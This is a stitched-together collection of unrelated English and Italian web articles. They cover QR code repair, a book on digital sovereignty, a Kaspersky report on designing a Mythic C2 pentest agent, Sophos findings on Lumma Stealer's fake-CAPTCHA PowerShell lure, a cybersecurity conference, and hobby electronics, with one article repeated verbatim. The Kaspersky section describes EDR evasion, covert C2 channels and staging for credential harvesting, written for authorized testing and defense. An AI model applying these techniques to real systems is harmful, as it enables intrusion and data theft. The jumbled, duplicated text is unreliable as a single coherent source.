It’s fair to say that QR codes are a technology that has finally come of age. A decade or more ago they were a little over-hyped and sometimes used in inappropriate or pointless ways, but now they are an accepted and useful part of life.
They’re not without their faults though, one of which is that despite four increasingly redundant levels of error correction, there comes a point at which a degraded QR code can no longer be read. [HumanQR] is soliciting these broken QR codes for research purposes and inclusion in an eventual open-source database, and they’ll even have a shot at repairing your submissions for you.
It’s a problem inherent to all digital media, that once the limit of whatever error correction they contain has been reached, they arrive at a cliff-edge at which they go immediately from readability to non readability. The example given in the linked article is a locator tag on a stray cat, it had been rubbed away in part. Improving its contrast, sharply defining its edges, and improving the definition of its fiducials was able to revive it, we hope leading to the cat being returned home.
The idea is that by studying enough damaged codes it should be possible to identify the means by which they become degraded, and perhaps come up with a way to inform some repair software. Meanwhile if you are interested, you might want to learn more about how they work, the hard way.
“In un cyberspazio globale e aperto, la piena sovranità digitale implica l’autorità complessiva di una nazione sui dati generati dai suoi cittadini, dall’amministrazione pubblica e dalle imprese. Ciò include la capacità di una nazione di impiegare tecnologie sicure per elaborare questi dati, supportate da una forza lavoro sufficiente, competente e fidata. Inoltre, comporta l’istituzione e il mantenimento di attivo di collaborazioni internazionali dinamiche e mirate, per affrontare proattivamente le minacce. Richiede infine, una società pienamente consapevole e educata sui rischi presenti nel cyberspazio”. In queste poche righe il professore Roberto Baldoni ha sintetizzato la sua idea di sovranità tecnologica raccontata nell’omonimo libro del Mulino (2025), Sovranità digitale. Cos’è e quali sono le principali minacce al cyberspazio nazionale.
Il saggio, riduzione aggiornata di un precedente testo in inglese dello stesso autore, Charting digital sovereignity. A survival playbook (Amazon, 2024), descrive in maniera sintetica i quattro ambiti che mettono a rischio la sovranità digitale intesa come autogoverno di dati, tecnologie, infrastrutture, persone, e cioè: a) gli attacchi informatici; b) le minacce alla supply chain delle forniture critiche; c) la diffusione delle tecnologie emergenti come Intelligenza artificiale e Quantum Computing; d) le minacce sociali, industriali, tecnologiche e ibride.
I quattro ambiti vengono analizzati da Baldoni facendo ricorso anche ad esempi di cronaca e sono ricchi di dettagli circa il modo di operare di threat insider, hacker e APT, illustrano gli attacchi DDoS e ransomware, e illustrano i rischi della supply chain con riferimento ai casi SolarWinds e Kaseya, all’emergenza dei chatbot e degli algoritmi predittivi, fino alla disinformazione costitutiva dei social network, citando i famosi casi della Brexit, del Pizzagate e del passaggio di mano di Twitter, oggi X.
Roberto Baldoni, veterano del settore, per venti anni docente di Sistemi distribuiti alla facoltà di Ingegneria della Sapienza Università di Roma, ideatore dell’Agenzia per la cybersicurezza nazionale e suo primo direttore dal 2021 al 2023, è tuttavia attento a chiarire che quello di sovranità digitale è un concetto mobile che gli stessi studiosi non hanno ancora definito in maniera univoca e che gli Stati nazione interpretano in maniera diversa. E tuttavia insiste su una definizione operativa, la capacità di una nazione di proteggere il proprio cyberspace come se proteggesse un territorio fisico, e il cui fallimento equivale a consegnare i suoi abitanti a un potere oscuro e incontrollabile, quello di un progresso dove attori malevoli sfruttano macchine che sopravanzano gli umani e aggirano tutti i contrappesi della democrazia.
The way threat actors use post-exploitation frameworks in their attacks is a topic we frequently discuss. It’s not just about analysis of artifacts for us, though. Our company’s deep expertise means we can study these tools to implement best practices in penetration testing. This helps organizations stay one step ahead.
Being experts in systems security assessment and information security in general, we understand that a proactive approach always works better than simply responding to incidents that have already occurred. And when we say “proactive”, we imply learning new technologies and techniques that threat actors may adopt next. That is why we follow the latest research, analyze new tools, and advance our pentesting expertise.
This report describes how our pentesters are using a Mythic framework agent. The text is written for educational purposes only and intended as an aid for security professionals who are conducting penetration testing with the system owner’s consent.
It’s worth noting that Kaspersky experts assign a high priority to the detection of the tools and techniques described in this article as well as many similar others employed by threat actors in real-world attacks.
These efforts to counter malicious actors use solutions like Kaspersky Endpoint Security that utilize the technologies listed below.
Behavioral analysis tracks processes running in the operating system, detects malicious activity, providing added security for critical OS components such as the Local Security Authority Subsystem Service process.
Exploit prevention stops threat actors from taking advantage of vulnerabilities in installed software and the OS itself.
Fileless threats protection detects and blocks threats that, instead of residing in the file system as traditional files, exist as scheduled tasks, WMI subscriptions, and so on.
However, it’s worth noting that since our study discusses a sophisticated attack controlled directly by a malicious actor (or a pentester), more robust defense calls for a layered approach to security. This must incorporate security tools to help SOC experts quickly detect malicious activity and respond in real time.
These include Endpoint Detection and Response, Network Detection and Response and Extended Detection and Response solutions as well as Managed Detection and Response services. They provide continuous monitoring and response to potential incidents. Usage of threat intelligence to acquire up-to-date and relevant information about attacker tactics and techniques is another cornerstone of comprehensive defense against sophisticated threats and targeted attacks.
This study is the product of our exploration and analysis: how we as defenders can best prepare and what we should expect. What follows is part one of the report in which we compare pentesting tools and choose the option that suits the objectives of our study. Part two deals with how to communicate with the chosen framework and achieve our objectives.
Pentester tools: how to choose
An overview of ready-made solutions
Selecting pentesting tools can prove a challenging task. Few pentesters can avoid detection by EPP or EDR solutions. As soon as a pentesting tool gains popularity among attackers, defensive technologies begin detecting not only its behavior, but also its individual components. Besides, the ability to detect the tool becomes a key performance indicator for these technologies. As a result, pentesters have to spend more time preparing for a project.
At the same time, many existing solutions have flaws that impede pentesting. Ethical hackers, for example, frequently use Cobalt Strike. The Beacon agent uses a specific opcode sequence in platform version 4.9.1. To avoid detection by security solutions, opcodes must be changed, but that breaks the agent.
Immutable opcode sequence for Cobalt Strike agent
Another example is Metasploit’s Meterpreter payload, whose signatures appear in Microsoft’s antivirus database more than 230 times, making the tool significantly more difficult to use in projects.
The Sliver framework is an open-source project. It is in active development, and it can handle pentesting tasks. However, this project has a number of drawbacks, too.
The size of a payload generated by the framework is 8–9 megabytes. This reduces flexibility because the ideal size of a pentesting agent that ensures versatility is about 100 KB.
Stability issues. We’ve seen active sessions drop. The framework once lacked support for automatically using a proxy server from the Windows configuration, which also complicated its use. This has since been addressed.
The Havoc framework and its Demon payload are currently gaining popularity: both are evolving, and both support evasion techniques. However, the framework currently suffers from a lack of compliance with operational security (OPSEC) principles and stability issues. Additionally, payload customization in Havoc is limited by rigid parameters.
As you can see, we cannot fully rely on open-source projects for pentesting due to their significant shortcomings. On the other hand, creating tools from scratch would require extra resources, which is inefficient. So, it’s crucial to strike the right balance between building in-house solutions and leveraging open-source projects.
Payload structure
First, let’s define what kind of payload is required for pentesting. We had decided to split it into three modules: Stage 0, Stage 1 and Stage 2. The first module, Stage 0, creates and runs the payload. It must generate an artifact, such as a shellcode, a DLL or EXE file, or a VBA script, and provide maximum flexibility by offering customizable parameters for running the payload. This module also handles the circumvention of security measures and monitors the runtime environment.
The second module (Stage 1) must allow the operator to examine the host, perform initial reconnaissance, and then use that information to establish persistence via a payload maintaining covert communications. After successfully establishing persistence, this module must launch the third module (Stage 2) to perform further activities such as lateral movement, privilege escalation, data exfiltration, and credential harvesting.
Three payload modules
The Stage 0 module has to be written from scratch, as available tools quickly get detected by security systems and become useless for penetration testing. To implement the Stage 1 module, we settled on a hybrid approach: partially modifying existing open-source projects while implementing some features in-house. For the third module (Stage 2), we also used open-source projects with minor modifications.
This article details the implementation of the second module (Stage 1) in detail.
Formulating requirements
In light of the objectives outlined above, we will formulate the requirements for the Stage 1 module.
Dynamic functionality, or modularity, for increased resilience. In addition, dynamic configuration allows adding techniques via new modules without changing the functional core.
Ensuring that the third payload module (Stage 2) runs.
Minimal size (100–200 KB) and minimal traces left in the system.
The module must comply with OPSEC principles and allow operations to run undetected by security controls. This means we must provide a mechanism for evading signature-based memory scanning.
Employing non-standard (hidden) communication channels, outside of HTTP and TCP, to establish covert persistence and avoid network detection.
Choosing the best solution
While defining the requirements, we recognized the need for a modular design. To begin, we need to determine the best way to add new features while running the tasks. One widely used method for dynamically adding functionality is reflective DLL injection, introduced in 2008. This type of injection has both its upsides and downsides. The ReflectiveLoader function is fairly easy to detect, so we’d need a custom implementation for a dynamic configuration. This is an effective yet costly way of achieving modularity, so we decided to keep looking.
The PowerShell Empire framework, whose loader is based on reflective PowerShell execution, gained popularity in the mid-2010s. The introduction of strict monitoring and rigid policies surrounding PowerShell marked the end of its era, with .NET assemblies, executed reflectively using the Assembly.Load method, gaining popularity. Around this time, toolkits like SharpSploit and GhostPack emerged. Cobalt Strike’s execute-assembly feature, introduced in 2018, allowed for .NET assembly injection into a newly created process. Process creation followed by injection is a strong indicator of compromise and is subject to rigorous monitoring. Injecting code requires considerable planning and tailored resources, plus it’s easily detectable. It’s best used after you’ve already performed initial reconnaissance and established persistence.
The next stage of framework evolution is the execution of object files in memory. An object file (COFF, Common Object File Format) is a file that represents a compiled version of the source code. Object files are typically not full-fledged programs: they are needed to link and build a project. An object file includes several important elements ensuring that the executable code functions correctly.
Header contains information about the architecture, timestamp, number of sections and symbols, and other metadata.
Sections are blocks that may include assembly code, debugging information, linker directives, exception information, and static data.
Symbol table contains functions and variables, and information about their location in memory.
Moreover, COFF is executed in the current context, without the need to create a process and inject the code into it. The feature was introduced and popularized in 2020 by the developers of the Cobalt Strike framework. And in 2021, TrustedSec developed the open-source COFF Loader that serves the same purpose: the tool loads a COFF file from disk and runs it. This functionality perfectly aligns with our objectives because it enables us to perform the required actions: surveying, gaining persistence within the system and initiating the next module via an object file – if we incorporate network retrieval and in-memory execution of the file in the project. In addition, when using COFF Loader, the pentester can remain undetected in the system for a long time.
To interact with the agent in this study, we decided to use BOFs (Beacon Object Files) designed for Cobalt Strike Beacon. The internet offers a wide variety of open-source tools and functions created for BOFs. By using different BOFs as separate modules, we can easily add new techniques at any time without modifying the agent’s core.
Another key requirement for Stage 1 is a minimal payload size. Several approaches can achieve this: for instance, using C# can result in a Stage 1 size of around 20 KB. This is quite good, but the payload will then have a dependency on the .NET framework. If we use a native language like C, the unencrypted payload will be approximately 50 KB, which fits our needs.
Our payload requirements are supported by the Mythic framework. Its microservice architecture makes it easy to add arbitrary server-side functionality. For example, the module assembly process takes place inside a container and is fully defined by us. This allows us to replace specific strings with arbitrary values if detected. Furthermore, Mythic supports both standard communication protocols (HTTPS, TCP) and covert channels, such as encrypted communication over Slack or Telegram. Finally, the use of C ensures a small payload size. All of these factors make the Mythic framework and the agent interacting with it to execute BOFs an optimal choice for launching the second module.
Communication model
In the communication process between the agent and the framework, we need to focus on three elements: payload containers, C2 profile containers, and the translation container. Payload containers hold the agent’s source code and are responsible for building the payload. C2 profile containers are responsible for communicating with the agent. They must receive traffic from the agent and send it to Mythic for further processing. The translation container handles the encryption and decryption of network traffic. We’ll be using HTTP when interacting with Mythic, so the C2 profile will be a web server listening on ports 80 and 443.
Communication flow between the agent and the Mythic framework
Loading an object file
To load and execute an object file, the agent must read the .text section and replace all zeros with relative addresses of external functions and static data. This is known as symbol relocation, which addresses references within a particular section of the object file. Furthermore, the agent places these symbols in memory, for example, after the code section.
To find external functions, we’ll have to analyze the libraries specified in the linker directives of the object file. To do this, we used the functions LoadLibrary, GetModuleHandle and GetProcAddress.
The diagram below clarifies how an object file is loaded and memory is allocated for its components.
Object file representation on disk (left) and in memory (right)
The downsides of the solution
The method described above has a number of shortcomings. Because object file execution is blocking, multiple tasks cannot run simultaneously. For long-term tasks, other methods such as process injection are necessary; however, this is not a critical flaw for the second module, as it is not intended for long-running tasks.
Several other shortcomings are difficult to mitigate. For example, since the object file is executed in the current thread, a critical error will terminate the process. Furthermore, during the execution of the object file in memory, the VirtualAlloc function is used for section mapping and relocation. A call to this WinAPI might alert the security system.
Implementing additional functionality during development and compilation can help complicate analysis and detection for more efficient pentesting and a longer agent life cycle.
Conclusion
Mythic’s features make it a convenient pentesting tool that covers the bulk of pentesting objectives. To utilize this framework efficiently, we created an agent that extends ready-made solutions with our own code. This configuration gave us suitable flexibility and enhanced protection against detection, which is most of what a pentester asks of a working tool.
LTSpice is a tool that every electronics nerd should have at least a basic knowledge of. Those of us who work professionally in the analog and power worlds rely heavily on the validity of our simulations. It’s one of the basic skills taught at college, and essential to truly understand how a circuit behaves. [Mano] has quite a collection of videos about the tool, and here is a great video explanation of how a bootstrap circuit works, enabling a high-side driver to work in the context of driving a simple buck converter. However, before understanding what a bootstrap is, we need to talk a little theory.
Bootstrap circuits are very common when NMOS (or NPN) devices are used on the high side of a switching circuit, such as a half-bridge (and by extension, a full bridge) used to drive a motor or pump current into a power supply. A simple half-bridge driving illustrates the high-side NMOS driving problem. From a simplistic viewpoint, due to the apparent symmetry, you’d want to have an NMOS device at the bottom and expect a PMOS device to be at the top. However, PMOS and PNP devices are weaker, rarer and more expensive than NMOS, which is all down to the device physics; simply put, the hole mobility in silicon and most other semiconductors is much lower than the electron mobility, which results in much less current. Hence, NMOS and NPN are predominant in power circuits.
As some will be aware, to drive a high-side switching transistor, such as an NPN bipolar or an NMOS device, the source end will not be at ground, but will be tied to the switching node, which for a power supply is the output voltage. You need a way to drive the gate voltage in excess of the source or emitter end by at least the threshold voltage. This is necessary to get the device to fully turn on, to give the lowest resistance, and to cause the least power dissipation. But how do you get from the logic-level PWM control waveform to what the gate needs to switch correctly?
The answer is to use a so-called bootstrap capacitor. The idea is simple enough: during one half of the driving waveform, the capacitor is charged to some fixed voltage with respect to ground, since one end of the capacitor will be grounded periodically. On the other half cycle, the previously grounded end, jumps up to the output voltage (the source end of the high side transistor) which boosts the other side of the capacitor in excess of the source (because it got charged already) providing a temporary high-voltage floating supply than can be used to drive the high-side gate, and reliably switch on the transistor. [Mano] explains it much better in a practical scenario in the video below, but now you get the why and how of the technique.
Lumma Stealer è un noto malware specializzato nel furto di informazioni, attivo sin dalla metà del 2022. Negli ultimi mesi ha mostrato un’evoluzione significativa nelle sue modalità operative, adottando nuove tattiche, tecniche e procedure. Questa minaccia è sempre più presente nei report relativi agli incidenti di sicurezza informatica: solo nell’ultimo anno, sono state registrate migliaia di compromissioni attribuite al malware.
Si ritiene che abbia origini nell’ambiente cybercriminale russo e venga attualmente distribuito come Malware-as-a-Service (MaaS). I suoi creatori offrono aggiornamenti frequenti e assistenza agli utenti tramite canali Telegram e una documentazione ospitata su Gitbook. L’obiettivo principale di Lumma Stealer è l’esfiltrazione di dati sensibili, come credenziali di accesso, token di sessione, wallet di criptovalute e informazioni personali raccolte dai dispositivi infetti.
Ciò che rende Lumma particolarmente pericoloso sono le sue sofisticate tecniche di distribuzione, che di recente si sono espanse fino a includere l’ingegneria sociale attraverso false domande CAPTCHAe ingannevoli richieste di download. Questi metodi sfruttano la fiducia degli utenti nei processi di verifica di sicurezza più noti , inducendo le vittime a eseguire comandi dannosi sui propri sistemi.
I ricercatori di Sophos hanno identificato diverse campagne Lumma Stealer durante l’autunno e l’inverno 2024-25, documentando come le tattiche del malware si sono evolute per eludere il rilevamento. “Le variazioni che abbiamo riscontrato nel comportamento di Lumma Stealer sono significative per i difensori”, ha osservato il team Sophos Managed Detection and Response nel suo report, sottolineando che queste tecniche di distribuzione potrebbero essere facilmente adattate ad altri malware oltre a Lumma Stealer.
Un’innovazione particolarmente preoccupante riguarda l’abuso di Windows PowerShell attraverso pagine di verifica CAPTCHA ingannevoli. Una casella di verifica dall’aspetto familiare (Fonte Sophos) In questa catena di attacchi, alle vittime che visitano siti dannosi viene presentata una richiesta di verifica standard “Non sono un robot”, creando un falso senso di sicurezza e legittimità. Dopo aver cliccato sulla casella di verifica, gli utenti vengono reindirizzati a una seconda pagina che chiede loro di caricare il comando “Esegui” di Windows, quindi premere Ctrl+V seguito da Invio. La successiva richiesta di “controllo di sicurezza” è un po’ insolita, ma abbastanza semplice per gli utenti incauti (Fonte Sophos) Questa azione apparentemente innocua in realtà incolla ed esegue un comando PowerShell nascosto che opera in una finestra nascosta:
L’esecuzione di questo comando avvia un sofisticato processo di attacco multifase. Lo script recupera componenti malware aggiuntivi dai server di comando e controllo, scaricando, estraendo ed eseguendo il payload principale di Lumma Stealer. Una volta attivo, questo malware accede sistematicamente ai dati del browser, come evidenziato nella Figura 6, dove Autolt3.exe accede ai dati di accesso e ai cookie di Chrome. Flusso di attacco con abuso CAPTCHA (Fonte Sophos) Ciò che rende questo vettore di attacco particolarmente efficace è l’impiego della crittografia AES per nascondere i payload successivi. Il malware impiega sofisticate tecniche di offuscamento, tra cui l’impiego di vettori di inizializzazione e complesse routine di decrittazione, per eludere le tradizionali misure di sicurezza.Questa combinazione di ingegneria sociale e metodi tecnici avanzati rappresenta un’evoluzione significativa nelle capacità di Lumma Stealer.
Gli esperti di sicurezza raccomandano di implementare soluzioni di protezione degli endpoint robuste con funzionalità di analisi comportamentale, poiché il solo rilevamento basato sulle firme si rivela inadeguato contro queste minacce in continua evoluzione.
Sabato 9 maggio, al Teatro Italia di Roma, si è chiusa la Red Hot Cyber Conference 2025, l’appuntamento annuale gratuito creato dalla community di RHC dedicato alla sicurezza informatica, alle tecnologie digitali emergenti, ma soprattutto ai giovani, sempre più numerosi ed appassionati ad ogni edizione e alla consapevolezza del rischio.
Massimiliano Brolli, il founder di Red Hot Cyber, ha dedicato moltissimo impegno nella creazione di questo evento e della community, per promuovere una visione etica in un mondo digitale.
Come cita il manifesto di RHC, “dalle ceneri del cyberpunk e dei vecchi gruppi hacker del passato che non si sono mai rassegnati a combattere per un mondo digitalmente più onesto e giusto, questo movimento di frontiera, vuole essere una voce fuori dal coro nel costruire dal basso un cambiamento, cercando di promuovere la cultura dell’hacking interdisciplinare, permettendo così all’Italia di incubare nuovi talenti che in futuro potranno renderci nuovamente protagonisti nella scena internazionale.“
I protagonisti del panel: Ivano Gabrielli, Luigi Montuori, Paolo Galdieri e Giuseppe Corasaniti
Protagonisti del panel sono state importanti figure istituzionali, tra cui il prezioso intervento di Ivano Gabrielli, Direttore della Polizia Postale, che ha portato il suo contributo in qualità di massimo responsabile del Servizio Polizia Postale e delle Comunicazioni, con una lunga esperienza nel contrasto al cybercrime e nella protezione delle infrastrutture critiche, Luigi Montuori, Direttore Dipartimento sanità e ricerca presso il Garante per la protezione dei dati personali, l’immancabile Paolo Galdieri, avvocato penalista, Cassazionista e docente universitario di Diritto penale dell’informatica e Giuseppe Corasaniti, ex magistrato e oggi Professore di infromatica guridica ed etica digitale all’Università Mercatorum, le cui interviste esclusive, insieme a quella di Luca Piccinelli, CISO Huawei Italia, Gabriele Faggioli di Clusit e Flavia Rizza sul cyberbullismo, saranno presto disponibili sul canale YouTube di Red Hot Cyber. Verrà anche pubblicato un video al giorno dell’evento, seguendo il programma della conferenza, insieme alla galleria fotografica di una conferenza che si conferma punto di riferimento della cybersecurity italiana e catalizzatore per le nuove generazioni.
Abbiamo infatti approfondito, con loro temi come la situazione dell’Italia in questo momento storico, del lato oscuro dell’IA, di cyber resilienza e cyber deterrenza, di transizione al Cloud, delle nuove figure emergenti con grandi capacità tecniche nelle indagini informatiche, di software spia, di attacchi APT alle telecomunicazioni ma anche di reti 5g, di Nis2, del confine invisbile tra crimine informatico e cyber terrorismo visto da un ex magistrato e molto altro ancora!
Red Hot Cyber 2025: gli interventi e i workshop
Ma sul palco del Teatro Italia, non sono mancate altre figure di spicco nel panorama della sicurezza informatica, come Aldo Di Mattia, Direttore SSE and Cybersecurity Advisor Italy & Malta che ha parlato della sfida impari tra Infrastrutture critiche e cybercriminali, Sunil Venazini, Principle Sales Engineer, che ha mostrato strategie e strumenti nell’era dell’IA tra attaccanti e difensori, il mitico Corrado Giustozzi, Founding Partner & Security Strategist, Resilience, che ha portato sul palco “La scomoda eredità della filosofia Hippie”. Ma non solo, Donato Onofri, Senior Red Team Engineer Crowdstrike ha parlato al pubblico di “The Rise of Patchless Attacks: Eccezioni Fantastiche e Dove Trovarle”, Michele Mezza, giornalista e docente della Federico II di Napoli, autore di Net War, che con il suo intervento ci ha parlato di “informazione come linguaggio della guerra ibrida”, seguiti dai ‘nostri’ Stefano Gazzella, giornalista e Data Protection Officer, con “Cani da Guardia 4.0,Informazione e Divulgazione Cyber” e Pietro Melillo, CISO di Wuerth Italia, con “Un anno di DarkLab tra Intelligence a Threat Actors e non ultimi Agostino Pellegrino, Cyber Security Expert. che con il suo speech “Phishing Avanzato, Inganno, Intelligence e Attacchi Omografici” ci ha illustrato come una Wi-Fi può venire hackerata, Roberto Camerinesi, ethical hacker e CTO di Cyber Evolution, che ha portato tra il pubblico le nuove frontiere dell’hacking satellitare con “Houston, abbiamo un problema”, ed infine il geniale e divertente Antonio Montillo, ethical hacker e ricercatore di sicurezza, con il suo immancabile cappello da “Malware Chef” che ha condiviso una delle sue migliori ricette: “Come Cucinare Una LLM Backdoor”. Nella lunga lista poi non si possono dimenticare gli interventi di Luca Almici, CEO di Enterprise con “Log Management e Sicurezza”, Luigi Martire, Cyber Threat Intelligence Analyst di Tinexta con “Threat intelligence e attribution: aaccia agli APT”, Selene Giupponi, Manager Director Europe Resecurity, con “Le Nuove Frontiere Della CTI Nell’era Dell’intelligenza Artificiale”. Questa lunga lista non sarebbe completa senza Nicola Dalla Vecchia, Senior Solutions Engineer, con “Attacchi alle API: il bersaglio nascosto della tua infrastruttura”, Irene Sorani, esperta di sicurezza informatica con “La strada lastricata di buone intenzioni: Verso Il Disastro Perfetto”, Raniero Rapone, Cyber Security Consulting Director & CYRAA Design Lead, con “Cyber Risk: quanto pensi di conoscerlo?” Giuliano Rulli, COO Oplium Italia con ”Il lato oscuro del Cloud: i dati sono al sicuro?”, Diego Fasano, CEO di Ermetix con “Anatomia di un attacco Mobile: sorveglianza elettronica ed esfiltrazione dati” Dario Pasquini, Andrea Paita, Cybersecurity Services Manager con “Cyber Threat Intelligence e AI: Tecnologie e Strumenti Al Servizio Del SOC”, Andrea Acito, Manging Director di Digimat con l’attualismo “Cybersecurity per le PMI: Dalla Consapevolezza alla Difesa Attiva” e Dario Pasquini, Principal Researcher at RSAC, con “Hacking back the AI hacker: defending against LLM-Driven cyberattacks”
L’inaugurazione dell’8 maggio ha coinvolto gli ospiti con i tradizionali workshop ‘hands-n’ realizzati in collaborazione con Accenture Italia, nei quali i partecipanti hanno potuto sperimentare direttamente le tecnologie con esercizi ad hoc mirati a perfezionare le competenze apprese come la creazione di un sistema IA di Visual Object Tracking, come hackerare un sito wordpress oppure entrare nel Dark Web in sicurezza. Si è dato anche spazio anche ad argomenti come il cyberbullismo con Flavia Rizza o la social engineering con la scoperta dei deepfake emergenti.
Red Hot Cyber Conference: la Capture The Flag
Lo stesso giorno è stata inaugurata la terza Capture The Flag (CTF) di Red Hot Cyber, realizzata in collaborazione con CyberSecurityUp di Fata Informatica, Hackmageddon World e la Fondazione Bruno Kessler (FBK), con le challenge relative all’ingegneria sociale. La sfida, che è stata coordinata dagli ethical hacker Antonio Montillo, Vincenzo Alonge, Andrea Tassotti, Thomas Kirschner, il collettivo hacker Hackerwood e il ricercatore di sicurezza Daniele Santoro, ha messo alla dura prova molti partecipanti. L’obiettivo dei 111 hacker distribuiti in 32 team è stato quello di colpire le infrastrutture critiche di uno stato oltre alla presenza di una bomba da dissinescare.
I vincitori dell’edizione RHC 2025, premiati la sera del 9 maggio, dopo due giorni di straordinario impegno, sono stati gli imbattibili PizzaFeijoda, seguiti dagli emergenti Winnerz e i veterani CarbonHackers.
Ancora una volta la Capture The Flag tra sfide di social engineering, analisi e crittografia, exploit di vulnerabilità, web hacking e altro ancora si è dimostrata un modo per sviluppare le capacità di problem solving, di improvvisazione e creatività, di pensiero critico, spirito di squadra e di strategia difensiva e offensiva, ma soprattutto ad essere stata premiata sono state la tenacia e la perseveranza, doti fondamentale per un hacker, così come per chiunque lavori nel campo della cybersecurity o dell’informatica in generale, perché senza anche il talento più brillante rischierebbe di non arrivare lontano.
Un appuntamento consolidato, giunto alla sua quarta edizione
Un’esperienza da ripetere? Sì, l’esperienza della Red Hot Cyber Conference si sta consolidando come un appuntamento fisso per i partecipanti, grazie all’elevato livello dei contenuti, alla presenza di ospiti di rilievo e all’attenzione verso la formazione dei giovani talenti. L’evento, giunto alla sua quarta edizione, continua a crescere in partecipazione e qualità, proponendo workshop pratici, competizioni di hacking e conferenze con esperti e rappresentanti istituzionali, un mix che rende la conferenza di RHC un’occasione imperdibile per chiunque sia interessato alla cybersecurity, all’innovazione tecnologica e alla cultura digitale, con un programma che punta a ripetersi e migliorarsi negli anni a venire!
We know [Happy Little Diodes] frequently works with logic analyzer projects. His recent wireless logic analyzer for the ZX Spectrum is one of the oddest ones we’ve seen in a while. The heart of the system is an RP2040, and there are two boards. One board interfaces with the computer, and another hosts the controller.
The logic analyzer core is powered by a common open-source analyzer from [Eldrgusman]. This is one of the nice things about open source tools. Most people probably don’t need a logic analyzer that plugs directly into a ZX Spectrum. But if you do, it is fairly simple to repurpose a more generic piece of code and rework the hardware, if necessary.
You used to pay top dollar to get logic analyzers that “knew” about common CPUs and could capture their bus cycles, show execution, and disassemble the running code. But using a technique like this, you could easily decode any processor, even one you’ve designed yourself. All you need to do is invest the time to build it, if no one else has done it yet.
One of the reconstructed images, using all 4,096 matrix patterns as input, next to the original object. (Credit: okooptics, Jon Bumstead) There’s a strange allure to single-pixel cameras due to the simultaneous simplicity and yet fascinating features that they can offer, such as no set resolution limit. That said, the typical implementations that use some kind of scanning (MEMS) mirror or similar approach suffer from various issues even when you’re photographing a perfectly stationary and static scene due to their complex mechanical nature. Yet there’s a way around this, involving a LED matrix and a single photoresistor, as covered by [Jon Bumstead] in an article with accompanying video.
As he points out, this isn’t a new concept, with research papers cited that go back many years. At the core lies the signal processing technique called compressed sensing, which is incidentally also used with computed tomography (CT) and magnetic resonance imaging (MRI) scanners. Compressed sensing enables the reconstruction of a signal from a series of samples, by using existing knowledge of the signal.
In the case of this single-pixel camera, the known information is the illumination, which is a Hadamard matrix pattern displayed on the 64 x 64 pixel LED matrix, ergo 4,096 possible patterns. A total of 4,096 samples are thus recorded, which are subsequently processed with a Matlab script. As pointed out, even 50% of the maximum possible matrices can suffice here, with appropriately chosen patterns.
While not an incredibly fast method, it is fully solid-state, can be adapted to use other wavelengths, and with some tweaking of the used components probably could cut down the sampling time required.
When [Terence Grover] set out to build a Tamagotchi-inspired simulator, he didn’t just add a few modern tweaks. He ditched the entire concept and rebuilt it from the ground up. Forget cute wide-eyed blobby animals and pixel-poop. This Raspberry Pi-powered project ditches nostalgia in favour of brutal realism: inflation, burnout, capitalism, and the occasional existential crisis. Think Sims meets cyberpunk, rendered charmingly in Python on a low-res RGB LED matrix.
Instead of hunger and poop meters, this dystopian pet juggles Maslow’s hierarchy: hunger, rest, safety, social life, esteem, and money. Players make real-life-inspired decisions like working, socialising, and going into education – each affecting the stats in logical (and often unfair) ways. No free lunch here: food requires money, money requires mind-numbing labour, and labour tanks your rest. You can even die of overwork à la Amazon warehouse. The UI and animation logic are all hand-coded, and there’s a working buzzer, pixel-perfect sprite movement, and even mini-games to simulate job repetition.
It’s equal parts social commentary and pixel art fever dream. While we have covered Tamagotchi recreations some time ago, this one makes you the needy survivor. Want your own dystopia in 64×32? Head over to [Terence Grover]’s Github and fork the full open source code. We’ll be watching. The Tamagotchi certainly is.
If the Otis King slide rule in [Chris Staecker’s] latest video looks a bit familiar, you might be getting up there in age, or you might remember seeing us talk about one in our collection. Actually, we have two floating around one of the Hackaday bunkers, and they are quite the conversation piece. You can watch the video below.
The device is often mistaken for a spyglass, but it is really a huge slide rule with the scale wrapped around in a rod-shaped form factor. The video says the scale is the same as a 30-inch scale, but we think it is closer to 66 inches.
Slide rules work using the idea that adding up logarithms is the same as multiplying. For example, for a base 10 logarithm, log(10)=1, log(100)=2, and log(1000)=3. So you can see that 1+2=3. If the scales are printed so that you can easily add and then look up the antilog, you can easily figure out that 10×100=1000.
The black center part acts like a cursor on a conventional slide rule. How does it work? Watch [Chris’] video and you’ll see. We know from experience that one of these in good shape isn’t cheap. Lucky that [Chris] gives us a 3D printed version so you can make your own.
Another way to reduce the scale is to go circular, and you can make one of those, too.
For circuit simulation, we have always been enthralled with the Falstad simulator which is a simple, Spice-like simulator that runs in the browser. [Brandon] has a simulator, too, but it simulates semiconductor devices. With help from [Paul Falstad], that simulator also runs in the browser.
This simulator takes a little thinking and lets you build devices as you might on an IC die. The key is to use the drop-down that initially says “Interact” to select a tool. Then, the drop-down below lets you select what you are drawing, which can be a voltage source, metal, or various materials you find in semiconductor devices, like n-type or a dielectric.
It is a bit tricky, but if you check out the examples first (like this diode), it gets easier. The main page has many examples. You can even build up entire subsystems like a ring oscillator or a DRAM cell.
Designing at this level has its own quirks. For example, in the real world, you think of resistors as something you can use with great precision, and capacitors are often “sloppy.” On an IC substrate, resistors are often the sloppy component. While capacitor values might not be exact, it is very easy to get an extremely precise ratio of two capacitors because the plate size is tightly controlled. This leads to a different mindset than you are used to when designing with discrete components.
Of course, this is just a simulation, so everything can be perfect. If, for some reason, you don’t know about the Falstad simulator, check it out now.
For circuit simulation, we have always been enthralled with the Falstad simulator which is a simple, Spice-like simulator that runs in the browser. [Brandon] has a simulator, too, but it simulates semiconductor devices. With help from [Paul Falstad], that simulator also runs in the browser.
This simulator takes a little thinking and lets you build devices as you might on an IC die. The key is to use the dropdown that initially says “Interact” to select a tool. Then, the drop-down below lets you select what you are drawing, which can be a voltage source, metal, or various materials you find in semiconductor devices, like n-type or a dielectric.
It is a bit tricky, but if you check out the examples first (like this diode), it gets easier. The main page has many examples. You can even build up entire subsystems like a ring oscillator or a DRAM cell.
Designing at this level has its own quirks. For example, in the real world, you think of resistors as something you can use with great precision, and capacitors are often “sloppy.” On an IC substrate, resistors are often the sloppy component. While capacitor values might not be exact, it is very easy to get an extremely precise ratio of two capacitors because the plate size is tightly controlled. This leads to a different mindset than you are used to when designing with discrete components.
Of course, this is just a simulation, so everything can be perfect. If, for some reason, you don’t know about the Falstad simulator, check it out now.
Sometimes, a little goes a long way. I believe that’s the case with this tiny media control bar from [likeablob] that uses an ESP32-C3 Super Mini.
Image by [likeablob] via Hackaday.IOFrom left to right you’ve got a meta key that allows double functions for all the other keys. The base functions are play/pause, previous track, and next track while the knob handles volume.
